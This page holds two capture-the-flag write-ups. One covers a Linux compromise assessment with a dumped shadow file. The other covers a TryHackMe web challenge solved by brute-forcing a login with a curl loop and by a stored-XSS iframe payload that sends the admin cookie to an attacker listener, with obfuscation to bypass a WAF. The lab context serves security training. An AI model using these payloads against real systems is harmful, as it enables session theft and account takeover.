Let GEL LLC Provide You With all Your Internet Needs

We offer world class products and services for hosting, domains, email, marketing, and security.

Check it out HERE.

Linux Challenge

Incident Scenario

Based on the threat intel report received, an infamous hacking group, IronShade, has been observed targeting Linux servers across the region. Our team had set up a honeypot and exposed weak SSH and ports to get attacked by the APT group and understand their attack patterns. 

You are provided with one of the compromised Linux servers. Your task as a Security Analyst is to perform a thorough compromise assessment on the Linux server and identify the attack footprints. Some threat reports indicate that one indicator of their attack is creating a backdoor account for persistence.

Challenge

Investigate the server and identify the footprints left behind after the exploitation.

1. What is the Machine ID of the machine we are investigating?

2. What backdoor user account was created on the server?
   root@cybertees:/home/ubuntu# cat /etc/shadow
   root::18561:0:99999:7::: daemon::18561:0:99999:7:::
   bin::18561:0:99999:7::: sys::18561:0:99999:7:::
   sync::18561:0:99999:7::: games::18561:0:99999:7:::
   man::18561:0:99999:7::: lp::18561:0:99999:7:::
   mail::18561:0:99999:7::: news::18561:0:99999:7:::
   uucp::18561:0:99999:7::: proxy::18561:0:99999:7:::
   www-data::18561:0:99999:7::: backup::18561:0:99999:7:::
   list::18561:0:99999:7::: irc::18561:0:99999:7:::
   gnats::18561:0:99999:7::: nobody::18561:0:99999:7:::
   systemd-network::18561:0:99999:7::: systemd-resolve::18561:0:99999:7:::
   systemd-timesync::18561:0:99999:7::: messagebus::18561:0:99999:7:::
   syslog::18561:0:99999:7::: _apt::18561:0:99999:7:::
   tss::18561:0:99999:7::: uuidd::18561:0:99999:7:::
   tcpdump::18561:0:99999:7::: sshd::18561:0:99999:7:::
   landscape::18561:0:99999:7::: pollinate::18561:0:99999:7:::
   ec2-instance-connect:!:18561:0:99999:7:::
   systemd-coredump:!!:19050::::::
   ubuntu:!$6$dLobQ2F0caobSv1W$xeAAh1v5GE7irQ3fFFMjZtV.P83VQL0yiJKLkebZ63hUqs2dVJF6ub35xNDjG08Aq6f3MPxH7lnuCpc.gQBxb.:19769:0:99999:7:::
   lxd:!:19050::::::
   kernoops::19050:0:99999:7::: lightdm::19050:0:99999:7:::
   whoopsie::19050:0:99999:7::: dnsmasq::19050:0:99999:7:::
   avahi-autoipd::19050:0:99999:7::: usbmux::19050:0:99999:7:::
   rtkit::19050:0:99999:7::: avahi::19050:0:99999:7:::
   cups-pk-helper::19050:0:99999:7::: geoclue::19050:0:99999:7:::
   pulse::19050:0:99999:7::: speech-dispatcher:!:19050:0:99999:7::: saned::19050:0:99999:7:::
   nm-openvpn::19050:0:99999:7::: colord::19050:0:99999:7:::
   hplip::19050:0:99999:7::: gdm::19050:0:99999:7:::
   fwupd-refresh:*:19769:0:99999:7:::
   mircoservice:$6$mEUXWPTdSz8Epwbf$aNeUyqOBPXuhkIx50hPMA3q07kjnZh8g7jcwxt2KR/IBEmMaGgxBFc8DLH2DIkgSqAWTAmAKLYOh.AotTTrP7.:19940:0:99999:7::: <— Correct answer

3. What is the cronjob that was set up by the attacker for persistence?

1. Examine the running processes on the machine. Can you identify the suspicious-looking hidden process from the backdoor account?

• How many processes are found to be running from the backdoor account’s directory?

If you count the running processes in the figure above, we see 2 running processes.

• What is the name of the hidden file in memory from the root directory?

• What suspicious services were installed on the server? Format is service a, service b in alphabetical order.

• Examine the logs; when was the backdoor account created on this infected system?

There’s also a new user named “badactor” that seems suspicious.

• From which IP address were multiple SSH connections observed against the suspicious backdoor account?

• How many failed SSH login attempts were observed on the backdoor account?

8

• Which malicious package was installed on the host?

• What is the secret code found in the metadata of the suspicious package?

TryHackMe.com has some great capture the flag exercises on their site. In this posting I will go though the Farewell room.

The farewell server will be decommissioned in less than 24 hours. Everyone is asked to leave one last message, but the admin panel holds all submissions. Can you sneak into the admin area and read every farewell message before the lights go out?

Note: In case you want to start over or restart all services, visit http://10.66.143.32/status.php.

This is a vulnerable web application created with two core weaknesses:

1. Stored XSS on an admin reviewed message service
2. Weak API exposure

I used the following enumeration actions:

1. Gobuster
2. Brute force
3. XSS payload
4. WAF bypass
5. Final exploit

Here’s what we see when we load the page.

The site has:

1. Login with username/password
2. User-submitted Farewell message
3. admin login

This recent activity banner shows 3 users, who are active on the platform:

• adam
• nora
• deliver11

Let’s try a non-existent user and we get “invalid username or password” error message.

Now we can try a valid user and we get a different error message “Server hint: invalid password against the user” (weak sauce).

Now, we’ll run gobuster to discover directories.

(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.66.143.32/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.66.143.32/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s

/index.php (Status: 200) [Size: 5246]
/info.php (Status: 200) [Size: 87570]
/admin.php (Status: 403) [Size: 780]
/status.php (Status: 200) [Size: 3467]
/javascript (Status: 301) [Size: 317] [–> http://10.66.143.32/javascript/]
/logout.php (Status: 302) [Size: 0] [–> index.php]
/auth.php (Status: 403) [Size: 780]
/dashboard.php (Status: 302) [Size: 0] [–> /]

Going to info.php we see this. The site can be used for XSS if the cookie is HttpOnly.

Now we’ll run Burpsuite and capture login requests.

The response to the login request for user Deliver11 shows a “password_hint” parameter that reads: ”Capital of Japan followed by 4 digits.”

Here are the other three user captures:

The easiest password hint is for deliver11, Tokyo + 4 digits. We could try to brute force a guess of the four digits with Burp Intruder or ffuf, but that would probably trigger the WAF. Let’s use a shell script to check.

#!/bin/bash

for i in {0000..9999}; do
pass=”Tokyo$i”
echo “[+] Trying $pass”
res=$(curl -s -X POST “http://10.22.155.72/index.php” \ -d “username=deliver11&pass
word=$pass”)
echo “$res” | grep -q ‘”success”: true’ && echo “[FOUND] $pass” && break
done

After getting the password I logged into deliver11’s account and was given the first flag.

I also had the ability to send a message that would be approved by admin.

I then tried a basic <script>alert()</script> XSS payload to see if XSS was an option, but that was caught by the pesky WAF.

Then I tried an iframe to trigger JS.  <iframe src=”javascript:location=’//10.64.105.110:8000/’+document.cookie”> and that was also caught by the WAF.

We will modify the iframe to work.

<iframe src=”java&#115;cript:location=’//10.64.105.110:8000/’+top[‘doc’+’ument’][‘coo’+’kie’]”>

On the attack box I stared a listener. root@ip-10-64-105-110:~# python3 -m http.server 8000

Logged into the “Farewell server” as deliver11, and sent this in the message box.

Which gave me the PHPSESSID.

I then copied and pasted the admin PHPSESSHID into the cookies section of Inspect, Storage, and refreshed the admin.php screen to get the final flag.

By using [‘doc’+’ument’][‘coo’+’kie’] in the place of document.cookie we were able to bypass the WAF and get the admin cookie.